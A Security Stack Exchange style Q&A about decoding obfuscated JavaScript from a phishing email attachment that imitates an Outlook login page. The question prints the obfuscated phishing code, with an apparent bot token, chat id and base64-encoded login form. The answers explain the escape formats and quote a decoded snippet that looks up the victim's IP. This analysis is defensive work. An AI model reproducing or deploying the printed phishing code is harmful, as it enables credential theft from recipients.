# Who can we read the contents of the variable? Which format is used?

Tags: javascript, obfuscation

We are not IT security specialists but we are very curious to know more about a scam we received through mail.

We received a mail with a HTML file attached. The subject of the mail looked very clickbaity.

The title was: `Webshop will removed from server now , Update attached to stay active now..`

When you open the attached HTML file you see a login page for outlook.

Then we looked at the source code and found some weird looking variables between the script tags.

This is the code:

```
var \u0065mai\u006c="hiddenforsafety@hidden.com";var \u0074oken='577506\0703\x317:A\x41Hrvihv2\114Zw\x6b\x4b\u0076\u0058v\170q\u0046Fuo\x48HSklu\070J\u0075rf8';var c\u0068\u0061t_id=5253999887;var data=ato\u0062("P\103FET0NUWVBFI\x47\150\060bW\167+\103jxod\x471sI\u0047Rpcj\060ib\110R\171IiB\152b\107Fzcz\x30iI\151B\163\131W5\x6ePSJlb\151I\053C\u0069AgI\x43A8\141GV\u0068\132D4\113I\x43AgI\u0044xtZXR\x68I\x47\x680\144H\u0041\x74ZXF1a\130Y9IkN\u0076bnR\x6cbn\121tVHlwZ\u0053I\x67\u005929udG\126udD0\151dGV4dC\x39\x6f\144\1071sOyBjaGFyc\x32V\x30P\u0056VUR\x69\x304I\1524KICAgI\x44x0\x61XRsZ\x54\x35\124aWd\x75\x49\x47lu\111H\x52vI\x48lv\144X\x49g\131WNjb3VudD\167vdG\x6c\x30bGU+C\151Ag\x49CA8bWV0YSBodHRwL\127\126xdW\154\x32PS\112YLVVBLU\x4e\u0076bX\u0042\150d\u0047libG\125iIGNvbnR\u006cbn\u00519Ik\u006cF\120WV\x6bZ2Ui\120\x67ogICA\x67P\u00471l\x64G\u0045gb\x6dF\x74Z\u00540idmlld3BvcnQiIGN\166b\156R\u006c\x62\x6e\1219\x49ndpZHR\157\u0050W\x52\154dml\152Z\x5313\u0061\x57R\x30\x61\u0043\x77ga\x57\x35pd\x47\154h\142C\x31zY2\106sZT0x\114jAsIG\061\150eG\x6ctd\u0057\x30t\1432N\x68bGU9\115i\x34\u0077\114\103\102\u0031c2VyLX\x4e\152YW\x78h\131mxlP\u0058llcy\111+\103\x69A\x67ICA8c\x32NyaXB\060\x49\u0048NyYz0ia\x48\x520cHM\u0036\u004cy\x39ham\x464L\155dv\x622dsZ\x57\u0046\167aXMu\131\x329t\x4c2Fq\131XgvbGli\x63\1719\u0071\u0063X\x56\154\x63n\x6bvM\u007940\u004cjEvanF\x31\132XJ5Lm\u0031pb\x695q\u0063yI+PC\x39\172\u0059\x33JpcH\u0051+\103i\101\147IC\x418bG\154u\u0061y\u0042yZWw9In\x4eo\x62\x33J0\1313\x560IGljb\x324iIGhyZ\u0057\u0059\071Im\1500dHBzOi\x38vYW\u0046kY2RuL\1551\u007aZnRh\u0064XRo\x4cm5\154\x64C9zaGFyZW\121\166\x4dS\064\x77L\u0032\x4evbn\x52lbnQ\166aW1hZ\u0032\u0056z\u004c\062\x5ahdmlj\14225\x66\x59\u0056\x39l\x64\130\x42heWZ\156Z2\u0068x\x61W\u0046\160N2s\x35\u0063\u00329s\x4emxn\115\x695p\x59\x328i\x50iA\147ICAKIC\101g\111Dxs\141W\x35rI\x47\122hdGE\164\x62G9\150ZG\126\x79PSJj\132G\x34iIGNy\x623\x4ezb3JpZ2\x6cuPSJhbm\u0039\u0075eW1\x76\144\130\x4diIGhyZW\u00599Im\u00680\x64H\x42\172O\1518v\u0059\u0057FkY2Ru\x4cm1zZ\x6e\122hdXRoL\u006d\x35\x6cdC\071lc3Rz\u004cz\x49u\u004dS9j\x62250\x5aW50\1142N\u006b\142mJ1bm\x52s\u005a\130Mv\x5929\x75dm\u0056y\1322Vk\114nY\u0079LmxvZ2luLm\x31p\142l\u0039\066\u0061X\154\x30Z\152\150k\145\156Q5\132WcxczY\164\u00622\x68o\u0062GV\x6eMi5jc3\x4di\x49H\x4albD\060ic3R5bGV\x7a\141GV\154\u0064\x43\x49+Ci\u0041gI\103\x41\x38c2N\x79aXB0Pg\x6fgICAg\u0049\103\x41\147ICQ\157ZG9jdW\061\x6c\142nQpLn\112lY\127R5\x4bGZ1bmN\x30a\x57\x39u\113C\153\147eyQ\x6fIi\u004ekaXN\167bG\x465Tm\106t\x5aSIpL\x6d\u0056t\u0063HR\065KCk\165YXB\167ZW5kKG\u0056\164\x59WlsKTs\147JC5\156\132\x58\122KU\060\071OK\103J\x6fdHRw\x63zovL2FwaS5pcGlmeS5vc\155\143/Zm\071y\142WF0\120\u0057pzb24\x69L\x43\x42\155dW5\x6adGl\u0076bi\150\x6b\x59X\u0052h\x4bSB7J\u0043gi\x492d\155ZyI\u0070Lm\1500bWwoZ\x47F0YS5p\u0063\x43k7fSl9K\x54s\113ICAg\x49D\x77vc\x32Ny\x61XB0\x50go8L\u0032hlYWQ+Cjx\151b2R\065IG\x4esYX\x4ezPS\112jYiI\147c\063R5bG\x559I\155Rpc3\102sYX\1536IGJsb2\x4erOyI+CjxwIG\x6ckP\123Jn\132\x6d\u0063i\111\110\1160e\u0057\170\154PSJkaXNwbGF5O\x69Bub\x325lO\x79\x49+\x50\x439\x77Pg\1578\132m9y\x62SBuY\127\x31lPSJ\u006dMSIgaWQ9\111mkwMjg\170\x49iBu\1423\132\150b\107l\u006b\x59XRlPS\x4aub\x33Z\x68bGlk\x59XRlI\x69\u0042z\x63\u0047V\163\x62GNoZW\x4erPSJ\155Y\x57xzZS\x49gbW\126\x30aG9kP\x53\x4aw\u0062\063N0IiB0YXJnZXQ9I\15490b3AiIGF\061dG9j\1422\x31\x77b\x47V\060ZT0ib2Z\u006d\u0049iBhY\u0033\x52\x70b24\u0039\111\151I+\x43iAgICA\070Z\107l2IGNsYX\x4ezPSJsb2\u0064\160bi1\167\u0059\u0057d\u0070\x62\u006d\x460ZWQt\u0063G\106nZS\111+\x43iAgIC\101gICAgPGRpd\u0069B\160\u005aD\x30\151bGlnaHR\151b3hUZ\x571wbGF0\x5aUN\u0076bn\x52\150aW5\154ciI+\u0043\u006axka\u0058\x59g\x61\127Q9Im\x78p\1322\x680Y\x6d94QmFja\062dyb3VuZENvbnRha\1275\154ciI+C\u0069\u0041gICA8\132Gl2IGN\163YXNzPSJiY\x57\x4erZ3Jvd\127\u0035\u006b\114WltYW\144lLWhvbG\122\x6cciIgcm\x39sZ\x540i\u0063\u0048Jlc\x32Vu\x64\107F0aW9u\111j\x34\u004bICAgID\x78k\x61XY\147Y\x32\170hc3M9ImJhY\062\x74ncm\0711b\155\x51ta\u00571h\x5a2Ug\132X\150\060\114WJh\x592tncm9\u0031bmQt\141W\061hZ2\x55iIHN0\145\u0057xlP\123J\x69Y\x57NrZ3\x4av\144W\065\x6bL\127\x6ct\131W\x64\154OiB1cmwoJnF1b3\x51\x37aHR0cH\1156Ly9hYWR\152\132G4ubX\x4emd\x47\x461dGgubm\x56\x30L3NoYXJl\132\x43\x38xLjAv\u00592\u0039\x75dG\126u\u0064C9pbWFnZXMvYmF\x6aa2\x64yb3V\x75\132HMv\u004dl\071iY\u007aNkMzJhNjk\x32OD\x6b1\132jc\u0034YzE\065ZG\131\x32Yz\143x\x4e\x7a\1254\116m\1051\132C5zdmcm\x63XVvdDspO\u0079I+\x50C9k\x61\u0058Y+Cjwv\u005aGl2\120\152wvZG\1542\120\147\x6f8ZGl2I\107NsYXNzPSJvdXR\x6cc\u0069\111+\103i\101\u0067\x49CA8ZGl2\x49GN\x73YX\x4e\x7aPSJ0\132W\x31w\142GF0\x5aS1zZWN0\141W9\x75\x49G1h\x61W\064tc2\126j\144\107lvbi\111+C\151Ag\111C\101g\x49CAgP\u0047Rp\u0064iB\u006abG\x46z\x63z\x30ibW\154k\132G\x78\u006c\111GV\x34d\1031taWR\x6b\142G\x55i\x50gogICAgICAgICAg\111C\x418\132G\1542IGNsY\u0058Nz\120SJm\144Wx\u0073L\u0057h\154a\127dodCI\u002b\x43jx\153aX\u0059g\x592\u0078hc3M9\u0049m\132sZ\x58gtY29sdW1\165\111j4\u004b\x49C\101g\u0049\104xk\x61\x58Y\u0067Y2x\u0068\x63\u0033M\071Indpb\u0069\x31\x7aY\u0033JvbGw\151Pgo\x67ICA\x67\x49C\x41gIDxkaXYgaW\x51\071Imxp\x5a\x32h0\u0059\u006d\x394I\x69B\x6a\x62GFz\x63z0\u0069c2\x6cn\142i\061\x70bi1ib3\147\x67ZXh0\x4cXN\160Z24t\u0061\1274t\x59\1559\u0034IGZ\u0068ZG\125t\x61W4\u0074b\107lnaH\u0052ib\u0033gi\x50gogICAgICAgI\104\170\u006baX\131+P\107ltZyB\u006abGFz\x63\u007a0ibG\x39\156byI\147c\1559sZT0\151aW\x31\x6eIi\102wb\155d\172cmM9\x49\155h0dH\102zOi8vY\127FkY2RuLm1z\x5anRhdX\x52oLm5\154dC9zaG\u0046y\u005aWQv\u004dS\u0034wL2NvbnRlb\x6eQva\127\x31hZ2VzL2\x31pY3J\166c29\x6d\144\x46\u0039s\x622d\x76\u0058\x32V\x6b\x4fWM\065ZWI\u0077ZGN\u006cM\124d\u006bNzUyY\u006dVkZ\x57\105\u0032\x59jVhY2\x52h\x4emQ\u0035\u004cnBuZyIg\x633Znc\063J\u006aP\u0053Jo\144\x48R\x77\143z\157v\x4c2FhZG\116kbi5\164c2Z0\x59\x58V0aC5\x75\132X\x51vc2hhcmVk\x4czEu\u004dC9\x6a\x622\u00350Z\x575\u0030L2ltY\u0057dlcy\u0039taW\u004eyb3NvZn\122f\142G9nb\x319l\x5a\x54\x56jOG\1215\u005a\155I2\x4djQ4Yzk\172O\u0047ZkMGRjMT\u006b\u007aN\u007aBlOTBi\132C\x35zdmci\111\110\116yY\172\060ia\x48R\060c\110M6L\1719hYWRjZG4ub\130NmdGF1d\107gub\u006dV\060\x4c\x33N\u006f\131\u0058\112lZC8x\114jAvY\x329udGV\165dC9\u0070\x62W\x46n\132XMvbWljc\x6d9zb2Z0X2\x78\x76Z2\x39\146ZWU1Yzh\u006bOWZ\x69NjI\060OG\u004d5M\172\150m\x5a\x44\x42k\u0059z\x45\x35\x4dzcw\132TkwY\155Qu\x633ZnIi\102h\142\x48Q9Ik1\x70Y3Jv\14329md\u0043I+P\1039\153aXY+Ci\x41g\111\103A\x67\x49\103A\u0067PGRpdiB\x79b2xlPSJt\x59WluIj4K\u0050GRp\144iBjbGF\x7acz0i\x59W5\x70\142\u0057F0\x5aSBz\u0062Gl\u006bZ\x531\x70b\u00691uZX\x680Ij4K\x49CAg\x49CAgIC\x418ZG\1542ID\x34KPGRpdi\x42jbGF\x7acz0ia\127R\x6c\x62nRpdHlCY\u00575u\x5a\130I\u0069P\x67ogICA\x67\x50\107\x52\160\x64i\x42pZ\x440iZG\154zcG\x78\u0068e\u0055\065hbWU\u0069IGN\163YXNzPS\112pZGVu\x64\u0047l0e\123I+P\1039\u006b\x61XY+C\u006awvZ\u0047l\x32Pjwv\132Gl2\u0050gogI\103A\x67\x50C9ka\130Y+CiAgI\103A\u0038\u005a\107l\x32IGNs\u0059X\x4e\u007aPSJw\x59Wdpbm\u00460aW9uLX\132\160ZX\143g\131W5pbW\1060ZSB\157Y\130\x4dta\x57\x52l\x62n\x52pdHktY\155\x46u\u0062mV\171IH\x4esaWR\154LWluL\x57\065l\x65\110Q\u0069\120g\157gICA\147\u0050\x47R\x70dj\x34KCj\u0078kaXY\147aWQ9\111m\x78vZ\062luS\x47Vh\x5a\107\u0056y\x49iBj\x62GF\172cz0\151cm\x393IH\122p\u0064Gx\u006cIGV\064\x64C\u00310aXR\u0073\u005a\x53I+CiAg\111\103\x41\x38ZG\u006c2IHJ\166\142GU\071ImhlY\x57Rpbm\x63iIGFy\u0061WEtb\x47\u00562ZWw\x39I\x6aEiPk\126\x75dGV\171\u0049HBhc\u0033\u004e3\x623Jk\u0050\u00439\u006b\x61X\131\x2bCjw\166ZG\1542Pg\1578\u005a\x47l\062IGlk\u0050SJl\143\u006eJ\x76\u0063\x6eB\x33IiB\x7a\u0064H\154\x73ZT0i\u005929sb3I6I\110J\x6cZDsg\142WF\x79\x5a2\x6cu\117\151AxNXB4O\x79Bt\x59X\x4ana\x574tbGVmd\104ogM\110B\u0034O\171B\u0074\131XJnaW4tdG9wOiAwcHg\067\u0049\x471hc\155d\160b\151\x31ib3R0b\x320\x36\x49DBweDsi\x50jw\166ZGl2\x50\147o8ZG\x6c2IG\x4es\x59XN\x7aPSJyb3c\x69\x50\x67ogI\103\101\147\x50\u0047R\160\x64\151Bj\142\107\106z\143z\u0030iZm9ybS\061ncm91cCBj\u00622wtbW\121tMj\121iPg\u006f\147I\103\x41gI\u0043AgI\104x\u006baXYgY2x\u0068c3M9In\x42sY\127N\154\x61G\071s\u005aGVyQ\u00329udGFpbm\x56yIj\u0034K\x49CA\x67\u0049CAg\x49CAgICAgPGluc\110\1260\x49\107\x35h\142W\1259\x49nB\x68c3N\063ZCIgd\110lwZT0i\143\x47Fz\x633dvcm\x51i\x49GlkP\123Jp\u004dDEx\x4fCI\u0067\u0059XV0b2Nvb\u0058B\x73ZXRlP\x53Jv\132\x6d\x59iIGNsY\130N\172\120S\x4a\155b\u0033\u004a\164\114WNv\142nRyb\x32\167gaW5wdXQ\x67ZX\u00680\x4cWlu\x63HV\060IHRl\x65H\x51t\u0059m94\111GV\064d\103\x310ZXh\u0030LWJve\103I\147c\x47x\u0068Y2\x56\157b2\170\153Z\x58\u0049\071IlB\150c3\x4e\063\142\063JkIiByZ\130\106\u0031aXJ\u006c\x5aC\x41v\120go8\1142Rpd\x6a4KIC\x41\x67ID\x77vZ\x47l\062Pg\x6f8\x4c2\u0052p\x64j4\u004bPG\u0052pdj4KPG\x52pdiB\u006ab\u0047Fzc\1720\u0069cG9\172aX\122\x70\x62\u00324tY\x6e\1260d\u00479uc\x79I\053CiA\147I\x43A8ZGl\x32P\147o\147I\x43Ag\x49CAg\u0049\x44xkaXYgY\u0032x\x68\u0063\x33\u004d9\111nJ\u0076dyI+CiA\x67\111CAgI\x43Ag\111CAgID\170\x6b\u0061XY\147Y2xhc\x33\u004d\x39Im\x4e\166bC1t\x5a\u00430yN\103I+\103i\u0041g\x49C\x41gIC\x41gI\103\x41\147ICA\x67\x49CA8ZGl2IGNsYX\116zPSJ\x30ZXh0LTEzI\u006a\x34KI\u0043Ag\x49CA\u0067I\103\x41g\x49\103\101gIC\u0041gI\x43AgICA\x38ZGl\x32IG\116s\u0059\130Nz\120\x53Jm\u00623\112tLW\x64y\u0062\x33\126wIj\064KIC\u0041\147IC\x41g\u0049\u0043\101gIC\x41gIC\x41gICAgI\x43\u0041gICAgP\x47Eg\141WQ\x39Im\u006ckQ\x56\x39\121V\060RfRm\071\171Z290\125\u0047Fz\1433d\u0076cmQ\151\x49H\112vb\107U9\111m\x78pbms\u0069IGhyZW\x599IiM\u0069\120kZvc\u006dd\x76dHRlbiBteSBwYX\x4ezd29yZDwv\131T4KICAg\x49CA\u0067IC\u0041\147ICAgI\u0043A\u0067IC\101gI\103A\u0038L2Rpd\x6a4KP\u0047\122\u0070d\151Bj\x62\x47Fz\143\172\u0030iZm9ybS\061ncm91cCI\u002bC\x6awvZGl2Pgo\147ICA\147IC\x41\147IDx\153aXYgY2\170hc3M9\x49mZv\u0063m0t\1323Jv\144X\u0041\x69PgogICAgI\103\101gIC\101gIC\u00418YS\x42pZD0iaTE\x32\x4ej\u0067\u0069IG\150yZWY9Ii\x4d\151P\x6cNp\13224\147aW\u0034\x67d\x32l0aC\102\u0068bm90a\x47\126y\111\x47F\x6aY291bnQ8L\x32E+Ci\u0041gI\103\x41\x67\111CA\147\120C\z71kaXY+PC\x39\153a\x58\u0059+PC9\153\x61\x58Y\x2b\120\x439\u006baX\131\053\x43i\10…
```

How to decode this code? We tried almost everything, base64, hex, url etc.

Comment: Unfortunately, we are not a de-obfuscation service, and although this is likely malicious code, analysing the code is not a security matter but a programming matter. The fact that the email and file were clearly malicious, you know that the code that has been obfuscated so that you can't tell what it does is also malicious. Figuring out the puzzle of the code is just a coding puzzle.

Answer (score 2, accepted):

It's Javascript [obfuscated](https://en.wikipedia.org/wiki/Obfuscation_(software)) by [Unicode](https://en.wikipedia.org/wiki/Unicode).

`var \u0065mai\u006c="hiddenforsafety@hidden.com";var \u0074oken='577506\0703\x317:A\x41Hrvihv2\114Zw\x6b\x4b\u0076\u0058v\170q\u0046Fuo\x48HSklu\070J\u0075rf8';var c\u0068\u0061t_id=5253999887;var data=ato\u0062("P\103FET0NUWVBFI\x47\150\060bW\167+\103jxod\x471sI\u0047Rpcj\060ib\110R\171IiB\152b\107Fzcz\x30iI\151B\163\131W5\x6ePSJlb\151I\053C\u0069AgI\x43A8\141GV\u0068\132D4\113I\x43AgI\u0044xtZXR\x68I…`

- `\u` followed by four hexadecimal characters: `\u0065` is `e`, `\u006c` is `l`, `\u0074` is `t`, etc.
- `\x` followed by two hexadecimal characters: `\x31` is `1`, `\x41` is `A`
- `\` followed by three octal characters: `\070` is `8`

That makes the code deobfuscate into:

`var email="hiddenforsafety@hidden.com";var token='5775068317:AAHrvihv2…`

There are further obfuscation techniques in here as well, most notably in the `ato\u0062(…)` part, which, after deobfuscating the Unicode, is [`atob()`](https://developer.mozilla.org/en-US/docs/Web/API/atob), which converts [base64](https://en.wikipedia.org/wiki/Base64) text (printable characters) into [binary data](https://en.wikipedia.org/wiki/Binary_data).

Analyzing beyond that would require a lot more effort. You've already gone far enough to know that it's bad and should not be run.

Comment: Would you be willing to help create a canonical Q&A for obfuscated Javascript as we have for obfuscated PHP? https://security.meta.stackexchange.com/questions/2191/code-review-deobfuscation-why-is-it-considered-off-topic-here?cb=1 It's a gap in our canonical catalogue

Comment: @schroeder – The [canonical obfuscated PHP Q&A created by Mark Buffalo](https://security.stackexchange.com/q/115461/42391) is truly impressive. I'm not enough of an expert on obfuscated JS to make something of the same caliber, though my answer is perhaps half way there and linking Mark's gets a step closer (conceptually).

Comment: I don't expect the same length or quality. But a start? A canonical answer allows everyone  to contribute.

Answer (score 0):

After some research found that I can print the variables in developer tools.

Comment: That would require _running_ the malicious code. I don't recommend that.

Answer (score 0):

If you decode it with unicode first and then base64, it's html that consists of the outlook site you saw. Did it have the correct url?

This script was located in the B64:

> $(document).ready(function()$("#displayName").empty().append(email);
> $.getJSON("https://api.ipify.org?format=json",  function(data)
> $("#gfg").html(data.ip);)